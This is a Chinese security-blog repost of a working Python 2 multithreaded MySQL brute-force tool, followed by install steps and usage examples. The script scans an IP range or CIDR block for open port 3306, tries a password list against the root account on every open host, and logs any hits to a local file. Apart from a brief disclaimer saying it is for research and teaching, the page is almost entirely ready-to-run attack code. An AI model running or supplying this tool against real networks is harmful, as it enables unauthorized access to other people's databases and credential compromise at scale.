python多线程mysql爆破脚本

admin
admin
admin
138876
文章
114
评论
2021年9月8日10:59:11评论143 views字数 2149阅读7分9秒阅读模式
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: Lcy # @Last Modified by:   Lcy # @Email: [email protected] import threading import argparse import socket import Queue import netaddr import MySQLdb import time import sys class Mysqlfuzz:     def __init__(self,addr,tnum):         self.scanque = Queue.Queue()         self.tnum = tnum         self.tmpnum = tnum         self.lock = threading.Lock()         self.openlist = []         if addr.find("-") != -1:             for ip in netaddr.IPRange(addr.split("-")[0],addr.split("-")[1]):                  self.scanque.put(ip)         else:             for ip in netaddr.IPNetwork(addr).iter_hosts():                  self.scanque.put(ip)         self.qsize = self.scanque.qsize()         for i in range(tnum):             t = threading.Thread(target=self.ScanPort)             t.setDaemon(True)             t.start()         while self.tmpnum > 0:             time.sleep(1.0)         print "[*]:cracking MySQL Password ..."         with open("pass.txt","r") as file:             data = file.readlines()         for ip in self.openlist:             for line in data:                 self.scanque.put(line.strip())             for i in range(tnum):                 t = threading.Thread(target=self.Crack,args=(ip,))                 t.setDaemon(True)                 t.start()             while self.scanque.qsize() > 0:                 time.sleep(1.0)      def Crack(self,ip):         while self.scanque.qsize() > 0:             try:                 password = self.scanque.get()                 conn=MySQLdb.connect(host=ip,user='root',passwd=password,db='test',port=3306,connect_timeout=4)                 self.lock.acquire()                 msg = "[+]:%s Username: root Password is: %s" %(ip,password)                 print msg                 output = open('good.txt', 'a')                 output.write(msg + "rn")                   self.lock.release()                 break             except:                 pass      def ScanPort(self):         while self.scanque.qsize() > 0:             try:                 ip = self.scanque.get()                 s = socket.socket()                 s.settimeout(4)                 s.connect((str(ip), 3306))                 self.lock.acquire()                 print ip," 3306 open"                 self.openlist.append(str(ip))                 self.lock.release()             except:                 pass         self.tmpnum -= 1 if __name__ == "__main__":     parse = argparse.ArgumentParser(description="mysqlfuzz")     parse.add_argument('-a','--addr', type=str, help="ipaddress")     parse.add_argument('-t','--thread', type=int, help="Thread Number",default=100)     args = parse.parse_args()     if not args.addr:         parse.print_help()         sys.exit(0)     addr = args.addr     tnum = args.thread     Mysqlfuzz(addr,tnum)

python多线程mysql爆破脚本

需要安装的模块:

pip install netaddr

MySQLdb http://download.csdn.net/detail/weibin0320/6663763

支持ip段爆破和单ip爆破

python fuzz.py -a 192.168.1.1/24 -t 30

python fuzz.py -a 192.168.1.23 -t 30

python fuzz.py -a 192.168.1.1-192.168.1.255 -t 30


本文始发于微信公众号(飓风网络安全):python多线程mysql爆破脚本

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月8日10:59:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   python多线程mysql爆破脚本https://cn-sec.com/archives/359781.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息